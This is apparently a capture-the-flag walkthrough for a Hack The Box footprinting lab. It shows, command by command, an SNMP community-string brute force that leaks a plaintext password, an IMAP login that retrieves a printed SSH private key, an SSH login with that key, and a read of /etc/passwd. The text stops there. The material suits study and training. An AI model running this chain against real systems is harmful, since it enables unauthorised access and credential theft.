The Hack The Box (HTB) Footprinting module teaches you how to analyze and footprint a target. Here’s how to derive the solution and capture the flag.
In this last of three Hack The Box footprinting labs, we are given the following instructions.
Enumerate the server carefully and find the username “HTB” and its password. Then, submit HTB’s password as the answer.
The third server is an MX and management server for the internal network. Subsequently, this server has the function of a backup server for the internal accounts in the domain. Accordingly, a user named HTB was also created here, whose credentials we need to access.
Scan the target using nmap
To begin, scan the target using a basic nmap scan. The command nmap -sV -sC 10.129.202.20 -Pn performs a network scan of the host at IP address 10.129.202.20 using several specific options:
-Pn: Disables host discovery (ping scan). By default, Nmap tries to determine if a host is online before scanning it, usually by sending ICMP echo requests or TCP SYN packets. The -Pn option tells Nmap to skip this step and treat the host as if it is up, scanning it directly. This is useful if the host blocks ping requests or if you know it is online and want to avoid being filtered by firewalls that block ping.
-sV: Enables service version detection. Nmap will probe open ports to determine what service is running on each port and, if possible, identify the version of the software providing the service.
-sC: Runs a set of default scripts using the Nmap Scripting Engine (NSE). These scripts are designed to quickly gather additional information about the target, such as checking for common vulnerabilities, retrieving banners, or enumerating users.
sudo nmap -sV -sC 10.129.202.20 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-30 11:10 CDT
Nmap scan report for 10.129.202.20
Host is up (0.068s latency).
Not shown: 995 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
|_ 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA SASL(PLAIN) UIDL TOP USER RESP-CODES PIPELINING AUTH-RESP-CODE STLS
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE more ID have post-login capabilities listed STARTTLS IMAP4rev1 Pre-login OK AUTH=PLAINA0001 LOGIN-REFERRALS LITERAL+ IDLE SASL-IR
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_imap-capabilities: ENABLE ID more have capabilities post-login listed IMAP4rev1 Pre-login OK IDLE LOGIN-REFERRALS AUTH=PLAINA0001 LITERAL+ SASL-IR
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) USER RESP-CODES PIPELINING AUTH-RESP-CODE TOP
| ssl-cert: Subject: commonName=NIXHARD
| Subject Alternative Name: DNS:NIXHARD
| Not valid before: 2021-11-10T01:30:25
|_Not valid after: 2031-11-08T01:30:25
|_ssl-date: TLS randomness does not represent time
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.27 secondsIn this scan, we find SSH and multiple email-related ports (110, 143, 993, 995).
Scan UDP using nmap
Next, we scan the UDP ports (-sU) on the target.
nmap -sV --top-port 100 -sU 10.129.202.20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-30 11:13 CDT
Nmap scan report for 10.129.202.20
Host is up (0.074s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
161/udp open snmp net-snmp; net-snmp SNMPv3 server
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.00 secondsThere is an open SNMP port that looks interesting.
Scan SNMP using onesixtyone
We can examine the service more carefully using the onesixtyone utility.
onesixtyone -c /opt/useful/seclists/Discovery/SNMP/snmp.txt 10.129.202.20
Scanning 1 hosts, 3219 communities
10.129.202.20 [backup] Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64Scan [backup] using snmpwalk
We find a [backup] community string that we can use to query the OIDs with snmpwalk.
snmpwalk -v2c -c backup 10.129.202.20
iso.3.6.1.2.1.1.1.0 = STRING: "Linux NIXHARD 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (137065) 0:22:50.65
iso.3.6.1.2.1.1.4.0 = STRING: "Admin <tech@inlanefreight.htb>"
iso.3.6.1.2.1.1.5.0 = STRING: "NIXHARD"
iso.3.6.1.2.1.1.6.0 = STRING: "Inlanefreight"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (21) 0:00:00.21
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (137946) 0:22:59.46
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 06 1E 10 1C 25 00 2B 00 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-90-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro ipv6.disable=1 maybe-ubiquity
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 142
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.1.1.0 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.2.6.66.65.67.75.85.80 = STRING: "/opt/tom-recovery.sh"
iso.3.6.1.2.1.25.1.7.1.2.1.3.6.66.65.67.75.85.80 = STRING: "tom NMds732Js2761"
iso.3.6.1.2.1.25.1.7.1.2.1.4.6.66.65.67.75.85.80 = ""
iso.3.6.1.2.1.25.1.7.1.2.1.5.6.66.65.67.75.85.80 = INTEGER: 5
iso.3.6.1.2.1.25.1.7.1.2.1.6.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.7.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.2.1.20.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.2.1.21.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.3.1.1.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.3.1.2.6.66.65.67.75.85.80 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:
Authentication token manipulation error
chpasswd: (line 1, user tom) password not changed
Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.3.1.3.6.66.65.67.75.85.80 = INTEGER: 4
iso.3.6.1.2.1.25.1.7.1.3.1.4.6.66.65.67.75.85.80 = INTEGER: 1
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.1 = STRING: "chpasswd: (user tom) pam_chauthtok() failed, error:"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.2 = STRING: "Authentication token manipulation error"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.3 = STRING: "chpasswd: (line 1, user tom) password not changed"
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = STRING: "Changing password for tom."
iso.3.6.1.2.1.25.1.7.1.4.1.2.6.66.65.67.75.85.80.4 = No more variables left in this MIB View (It is past the end of the MIB tree)We see what looks like attempts being made to change a password. Note this line in particular:
STRING: "tom NMds732Js2761"It looks like the username “tom” and a password of “NMds732Js2761”.
Try connecting to the IMAP service using the credentials we found with snmpwalk
We can use OpenSSL to connect to the IMAP service.
openssl s_client -connect 10.129.202.20:imaps
CONNECTED(00000003)
Can't use SSL_get_servername
depth=0 CN = NIXHARD
verify error:num=18:self-signed certificate
verify return:1
depth=0 CN = NIXHARD
verify return:1
---
Certificate chain
0 s:CN = NIXHARD
i:CN = NIXHARD
a:PKEY: rsaEncryption, 2048 (bit); sigalg: RSA-SHA256
v:NotBefore: Nov 10 01:30:25 2021 GMT; NotAfter: Nov 8 01:30:25 2031 GMT
---
Server certificate
-----BEGIN CERTIFICATE-----
MIIC0zCCAbugAwIBAgIUC6tYfrtqQqCrhjYv11bUtaKet3EwDQYJKoZIhvcNAQEL
BQAwEjEQMA4GA1UEAwwHTklYSEFSRDAeFw0yMTExMTAwMTMwMjVaFw0zMTExMDgw
MTMwMjVaMBIxEDAOBgNVBAMMB05JWEhBUkQwggEiMA0GCSqGSIb3DQEBAQUAA4IB
DwAwggEKAoIBAQDEBpDfkH4Ro5ZXW44NvnF3N9lKz27V1hgRppyUk5y/SEPKt2zj
EU+r2tEHUeHoJHQZBbW0ybxh+X2H3ZPNEG9nV1GtFQfTBVcrUEpN5VV15aIbdh+q
j53pp/wcL/d8+Zg2ZAaVYWvQHVqtsAudQmynrV1MHA39A44fG3/SutKlurY8AKR0
MW5zMPtflMc/N3+lH8UUMBf2Q+zNSyZLiBEihxK3kfMW92HqWeh016egSIFuxUsH
kk4xpGmyG9NDYna47dQzoHCg+42KgqFvWrGw2nIccaEIX5XA8rU9u53C7EQzDzmQ
vAtHpKWBwNmiivxAz/QC7MPExWIWtZtOqxmfAgMBAAGjITAfMAkGA1UdEwQCMAAw
EgYDVR0RBAswCYIHTklYSEFSRDANBgkqhkiG9w0BAQsFAAOCAQEAG+Dm9pLJgNGC
X1YmznmtBUekhXMrU67tQl745fFasJQzIrDgVtK27fjAtQRwvIbDruSwTj47E7+O
XdS7qyjFNBerklWNq4fEAVI7BmkxnTS9542okA/+UmeG70LdKjzFS+LjjOnyWzTh
YwU8uUjLfnRca74kY0DkVHOIkwZQha0J+BrKSADq/zDjkG0g4v0vzHINOmHx9eiE
67NoJKJPY5S3RYWxl/4x8Kphx7PNJBPC75gYjlxxDhxdYu9a3daqJUa58/qOm6P8
w1P9nA6lkg7NopyqepulLAzIcqnTjb/nMD2Pd9b6vgWc3IqSfFreqjzshZ+FjNZo
zR+tR6z4TQ==
-----END CERTIFICATE-----
subject=CN = NIXHARD
issuer=CN = NIXHARD
---
No client certificate CA names sent
Peer signing digest: SHA256
Peer signature type: RSA-PSS
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1283 bytes and written 377 bytes
Verification error: self-signed certificate
---
New, TLSv1.3, Cipher is TLS_AES_256_GCM_SHA384
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
Early data was not sent
Verify return code: 18 (self-signed certificate)
---
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 4016497443D6550218BD35682161D16CF4C6894ADC62946CD0DDC9DE1B9D3997
Session-ID-ctx:
Resumption PSK: A964DBF50EE05FCDAA5392531143E3170B48BDB107847A7F4369CD2A49D27C9798B84F098854E7F4E90203E72C1DEB72
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - e7 fe 1b 57 69 b8 c0 93-bf cb 36 dc 27 86 f6 86 ...Wi.....6.'...
0010 - 0f da ff d8 b7 02 ce bf-1f 94 3e 60 14 02 ca 0f ..........>`....
0020 - df a2 1b 7c 29 31 66 8b-98 29 a2 a3 c7 f4 cf 2e ...|)1f..)......
0030 - 0a f6 c6 e3 2d 76 18 af-e5 a6 05 96 e0 51 69 62 ....-v.......Qib
0040 - 5b aa 1f 37 97 f6 97 2c-d1 fc 27 15 c0 75 f9 2e [..7...,..'..u..
0050 - 4c 9d b6 0c 01 ba 04 4a-75 fe 0e d7 e6 89 4e ff L......Ju.....N.
0060 - c0 39 82 50 b0 2a bd 92-46 7c f4 4a 59 53 52 2f .9.P.*..F|.JYSR/
0070 - 5a 4b f2 5a 05 ec 24 de-7b 49 35 55 e5 8d 24 1b ZK.Z..$.{I5U..$.
0080 - 05 82 0c 7e 51 6c 01 10-c1 54 74 02 6d 8e b8 73 ...~Ql...Tt.m..s
0090 - e8 ee 34 cb ee 73 75 7b-35 77 44 cb 4c b9 2e d0 ..4..su{5wD.L...
00a0 - bb 30 f4 2f a3 04 5c ba-d0 15 e8 c5 03 97 af d6 .0./..\.........
00b0 - 4c 14 f7 a6 c9 ec 35 88-f7 3f 9e ac c8 26 bd d2 L.....5..?...&..
Start Time: 1751301368
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
---
Post-Handshake New Session Ticket arrived:
SSL-Session:
Protocol : TLSv1.3
Cipher : TLS_AES_256_GCM_SHA384
Session-ID: 64EDDE2EEB9C2403B774E5AE1A2B3A1FF8019AB11AD526BB0A3355B6BEE9C416
Session-ID-ctx:
Resumption PSK: 82E6EDA65B6E07883E89D97C7FED48A913C674E7B47003386BDA68386DEB946E60572F7529C5CA1801D9101E1B7A6F49
PSK identity: None
PSK identity hint: None
SRP username: None
TLS session ticket lifetime hint: 7200 (seconds)
TLS session ticket:
0000 - e7 fe 1b 57 69 b8 c0 93-bf cb 36 dc 27 86 f6 86 ...Wi.....6.'...
0010 - 7f 6b ba 61 02 02 6d 9e-3b 41 8d 07 bb 7e 29 58 .k.a..m.;A...~)X
0020 - 4f d7 4b 49 f1 a3 2c 37-ee 8d d4 08 38 b4 de 2e O.KI..,7....8...
0030 - df 93 3b 60 ed 0c 36 3f-dd 0a 3b 73 8c 78 b8 ec ..;`..6?..;s.x..
0040 - 12 e7 e4 75 d4 98 27 b1-28 57 77 68 6f 13 bc 1a ...u..'.(Wwho...
0050 - 74 83 0d 77 47 2f 07 c5-72 cc 3c 10 1b 6a fe 95 t..wG/..r.<..j..
0060 - 71 8c 18 83 1c 30 ff 70-85 32 9d df 98 0f 60 43 q....0.p.2....`C
0070 - e2 d7 b0 97 7a be 22 50-e7 f5 36 ef 27 65 dd bc ....z."P..6.'e..
0080 - f7 30 ba 60 99 df e0 c0-f9 a7 8b 81 02 b1 8f 0e .0.`............
0090 - 24 99 43 8c ae 7a ff 66-db df 9b 93 58 66 d1 20 $.C..z.f....Xf.
00a0 - c0 50 8b 33 0b 7d 4f 62-fa 84 11 b9 f4 71 c6 4e .P.3.}Ob.....q.N
00b0 - 90 55 e6 35 29 ef b2 1d-04 09 7c 72 4e 29 c1 1d .U.5).....|rN)..
Start Time: 1751301368
Timeout : 7200 (sec)
Verify return code: 18 (self-signed certificate)
Extended master secret: no
Max Early Data: 0
---
read R BLOCK
* OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot (Ubuntu) ready.Next, we attempt to log in with the “tom” user and the password we discovered via SNMP. Remember to include your index number (e.g., 1 LOGIN tom password). Then, list the mailboxes (1 LIST “” *).
1 LOGIN tom NMds732Js2761
1 OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE SORT SORT=DISPLAY THREAD=REFERENCES THREAD=REFS THREAD=ORDEREDSUBJECT MULTIAPPEND URL-PARTIAL CATENATE UNSELECT CHILDREN NAMESPACE UIDPLUS LIST-EXTENDED I18NLEVEL=1 CONDSTORE QRESYNC ESEARCH ESORT SEARCHRES WITHIN CONTEXT=SEARCH LIST-STATUS BINARY MOVE SNIPPET=FUZZY PREVIEW=FUZZY LITERAL+ NOTIFY SPECIAL-USE] Logged in
1 LIST "" *
* LIST (\HasNoChildren) "." Notes
* LIST (\HasNoChildren) "." Meetings
* LIST (\HasNoChildren \UnMarked) "." Important
* LIST (\HasNoChildren) "." INBOX
1 OK List completed (0.016 + 0.000 + 0.015 secs).We see a mailbox called INBOX. Select the inbox (1 SELECT INBOX) and we see there is one item in the box. Fetch the item (1 FETCH 1 BODY[]). It is an email from tech to Tom that includes a private SSH key.
1 SELECT INBOX
* FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
* OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)] Flags permitted.
* 1 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 1636509064] UIDs valid
* OK [UIDNEXT 2] Predicted next UID
1 OK [READ-WRITE] Select completed (0.005 + 0.000 + 0.004 secs).
1 FETCH 1 BODY
* 1 FETCH (BODY ("text" "plain" ("charset" "us-ascii") NIL NIL "7bit" 3430 49))
1 OK Fetch completed (0.493 + 0.000 + 0.492 secs).
1 FETCH 1 BODY[]
* 1 FETCH (BODY[] {3661}
HELO dev.inlanefreight.htb
MAIL FROM:<tech@dev.inlanefreight.htb>
RCPT TO:<bob@inlanefreight.htb>
DATA
From: [Admin] <tech@inlanefreight.htb>
To: <tom@inlanefreight.htb>
Date: Wed, 10 Nov 2010 14:21:26 +0200
Subject: KEY
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
)
1 OK Fetch completed (0.001 + 0.000 secs).
Copy the SSH key found in the email
Copy the SSH key we found in the email to a file (e.g., id_rsa_1).
nano id_rsa_1Change the permissions of the private key file
As is always required when using a private key, chmod the permissions on the file to 600.
chmod 600 id_rsa_1Use the newfound SSH key to connect
Use the private key you saved in id_rsa_1 to connect using SSH.
ssh -i id_rsa_1 tom@10.129.202.20
The authenticity of host '10.129.202.20 (10.129.202.20)' can't be established.
ED25519 key fingerprint is SHA256:AtNYHXCA7dVpi58LB+uuPe9xvc2lJwA6y7q82kZoBNM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.202.20' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-90-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon 30 Jun 2025 04:46:35 PM UTC
System load: 0.0 Processes: 165
Usage of /: 70.0% of 5.40GB Users logged in: 0
Memory usage: 29% IPv4 address for ens192: 10.129.202.20
Swap usage: 0%
* Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.
https://ubuntu.com/blog/microk8s-memory-optimisation
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Wed Nov 10 02:51:52 2021 from 10.10.14.20We find that the key worked. We are now on the system.
Check users on the host
cat the password file to see what users exist on the system.
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
